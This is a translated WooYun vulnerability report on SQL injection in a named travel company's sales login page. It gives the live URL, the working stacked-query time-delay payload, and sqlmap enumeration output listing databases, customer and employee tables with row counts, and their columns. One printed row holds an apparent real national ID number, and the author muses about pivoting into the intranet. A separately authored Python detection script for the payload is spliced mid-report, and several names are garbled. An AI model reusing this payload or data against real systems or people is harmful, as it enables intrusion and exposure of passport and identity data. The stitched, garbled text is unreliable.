
Vulnerability Summary

Defect ID: wooyun-2015-0117788

Title: SQL injection in a key Tempus International (腾邦国际) system leaks employee information and customer passport data

Vendor: 腾邦集团 (Tempus Group)

Author: 路人甲

Submitted: 2015-06-03 09:10

Fixed: 2015-07-20 14:22

Published: 2015-07-20 14:22

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability Details

Disclosure status:

2015-06-03: Details sent to the vendor; awaiting vendor action
2015-06-05: Vendor confirmed; details disclosed to the vendor only
2015-06-15: Details disclosed to core white hats and domain experts
2015-06-25: Details disclosed to regular white hats
2015-07-05: Details disclosed to trainee white hats
2015-07-20: Details disclosed to the public

Brief description:

233

Detailed description:

Login page of the http://sales.tempus.cn system (POST request and body shown below):
http://sales.tempus.cn:80/default.asp?action=login (POST)
submit=&textfield=AzRhEli1&textfield2=1

Proof of vulnerability:

---
Parameter: textfield (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: submit=&textfield=AzRhEli1');WAITFOR DELAY '0:0:5'--&textfield2=1
---
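The report gives no remediation, so the added example below (mine, not from the report or the vendor) shows a defender-side check over login form bodies for the stacked-query, time-delay pattern sqlmap found above: a closed quote, a statement separator, a T-SQL WAITFOR DELAY, and a trailing comment. The sample bodies are constructed, including a URL-encoded variant and a benign apostrophe case that must not trigger.

```python
import re
from urllib.parse import unquote_plus

# Indicators of the stacked-query, time-based payload form seen in this report.
# A quote (optionally followed by a closing paren) that ends the original string
# literal, then ';' and a T-SQL delay; a trailing '--' comment that discards the
# rest of the original statement. Matching is case-insensitive.
STACKED_DELAY = re.compile(r"""['"]\s*\)?\s*;\s*WAITFOR\s+DELAY""", re.IGNORECASE)
STACK_SEP = re.compile(r"""['"]\s*\)?\s*;""")
COMMENT_TAIL = re.compile(r"--\s*$|/\*.*\*/")


def parse_form(body: str) -> list[tuple[str, str]]:
    """Split an application/x-www-form-urlencoded body into decoded (name, value) pairs.
    Done by hand so ';' is never treated as a pair separator (older parse_qs did)."""
    fields = []
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields.append((unquote_plus(name), unquote_plus(value)))
    return fields


def score_value(value: str) -> list[str]:
    """Return the indicator names found in one decoded form-field value."""
    hits = []
    if STACKED_DELAY.search(value):
        hits.append("stacked_waitfor_delay")
    elif STACK_SEP.search(value):
        hits.append("statement_separator_after_quote")
    if COMMENT_TAIL.search(value):
        hits.append("trailing_comment")
    return hits


def inspect_form_body(body: str) -> dict[str, list[str]]:
    """Map each suspicious field name to the indicators found in it (empty dict = clean)."""
    findings: dict[str, list[str]] = {}
    for name, value in parse_form(body):
        hits = score_value(value)
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


# Constructed sample bodies (hypothetical): the report's payload, an encoded copy, a benign login.
SAMPLES = {
    "page_payload": "submit=&textfield=AzRhEli1');WAITFOR DELAY '0:0:5'--&textfield2=1",
    "encoded": "submit=&textfield=AzRhEli1%27%29%3BWAITFOR+DELAY+%270%3A0%3A5%27--&textfield2=1",
    "benign": "submit=&textfield=O'Brien&textfield2=p%40ss;word",
}
```

A signature check like this only flags this one payload family; the underlying fix is parameterised queries in the ASP login handler, which this check does not replace.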
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user: 'zytoa'
available databases [14]:
[*] [CobraDGSesver\x04]
[*] [dayniton\x02]
[*] [master\x03]
[*] [oanew\x05a1\x11\x02]
[*] AdvanEmpDb
[*] model
[*] msdb
[*] Standard_Global
[*] StandardCommonModule
[*] tempdb
[*] tgctour2010
[*] trafax60
[*] veetermsharelog
[*] zytoa
Database: zytoa
+------------------+---------+
| Table | Entries |
+------------------+---------+
| zytoa.kehu | 533296 | 530k customers, including passport information
| zytoa.gongdan | 407068 | 400k work orders
| zytoa.guoji | 374765 |
| zytoa.LogIP | 204865 |
| zytoa.tuipiao | 21037 |
| zytoa.piao | 10337 |
| zytoa.guonei | 8927 |
| zytoa.otherpiao | 7284 |
| zytoa.yjflog | 6257 |
| zytoa.gd | 1294 |
| zytoa.yjf | 669 |
| zytoa.News | 458 |
| zytoa.yuangong | 370 | employee information
| zytoa.gys | 198 |
| zytoa.airwayslxr | 173 |
| zytoa.airways | 139 |
| zytoa.piaogroup | 51 |
| zytoa.bumen | 24 |
| zytoa.quanxian | 18 |
| zytoa.bigbumen | 12 |
| zytoa.SmallClass | 3 |
+------------------+---------+
The column information is posted below; no data is posted as proof:
Table: zytoa.kehu
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
| pnrid | kehuid | guoji | baoxian | xingbie | xingming | huiyuanhao | piaohao | chengyun | huzhaohaoma | chushengnianyue | huzhaoyouxiaoqi | xingchengdan | zhengjiqnleixing |
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
| 119 | 100 | CN | | | 遟乓獞 | | | | 420112197609081519 | \x05 | | | |
+-------+--------+-------+---------+---------+----------+------------+------------+-------------+--------------------+-----------------+-----------------+-----------------+------------------+
Table: zytoa.gongdan
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
| pnrid | lianxidianhua | sub | flag | dahui | beizhu | lirunA | gystime | ifzhifu | pnrdata | pnrcode | kehutime | tiaojian | lianxiren | ITINERARY | zhifuyuan | zuoxiyuan | yuejiefang | zuoxibumen | dijia_heji | huilv\x11 | chupiaoyuan | shoujihaoma | diaoduyuanA | tuishenyuan | chushenyuan | songpiaoyuan | shoujia_heji | piaotype\t | chupiaobumen | zhifushijian | xieyijingban | gongyingshang | songpiaodizhi | diaodushijian | kepiaoxingshi | baoxian_dijia | zhongshenyuan | yingyebumaoli | BookingPerson | InvoiceNumber | fukuangfangshi | chupiaoshijian | tuishenshijian | jieshoushijian | chushenshijian | baoxian_source | tianjiashijian | songpiaoshixian | baoxian_shoujia | OwnerDepartment | baoxian_zhangshu | iSShanghaiyingyebu | zhongshenshijian\x05 |
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
+-------+---------------+-----+------+-------+--------+--------+---------+---------+---------+---------+----------+----------+-----------+-----------+-----------+-----------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+--------------+--------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+---------------+----------------+----------------+----------------+----------------+----------------+----------------+----------------+-----------------+-----------------+-----------------+------------------+--------------------+------------------------+
Table: zytoa.yuangong
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
| id | idcode | bumenid\x02 | qq | msn | theme | zuoji | email | zaizhi | shouji | username | xingming | quanxian | password | bumenquanxian |
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
+----+--------+---------------+----+-----+-------+-------+-------+--------+--------+----------+----------+----------+----------+---------------+
With the employee information in hand, is it possible to get into the intranet?
---------------------------------------------------------------------
Throwing in an IIS (8.3 short-name) enumeration as a bonus:


[Screenshot: 20150602174943.png]

Remediation:

~~~~~~~~~

Copyright notice: when reposting, please credit 路人甲@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-06-05 14:21

Vendor reply:

Thanks to the vendor and the white hat for their help in discovering this; we have already assigned staff, who are handling it.

Latest status:

None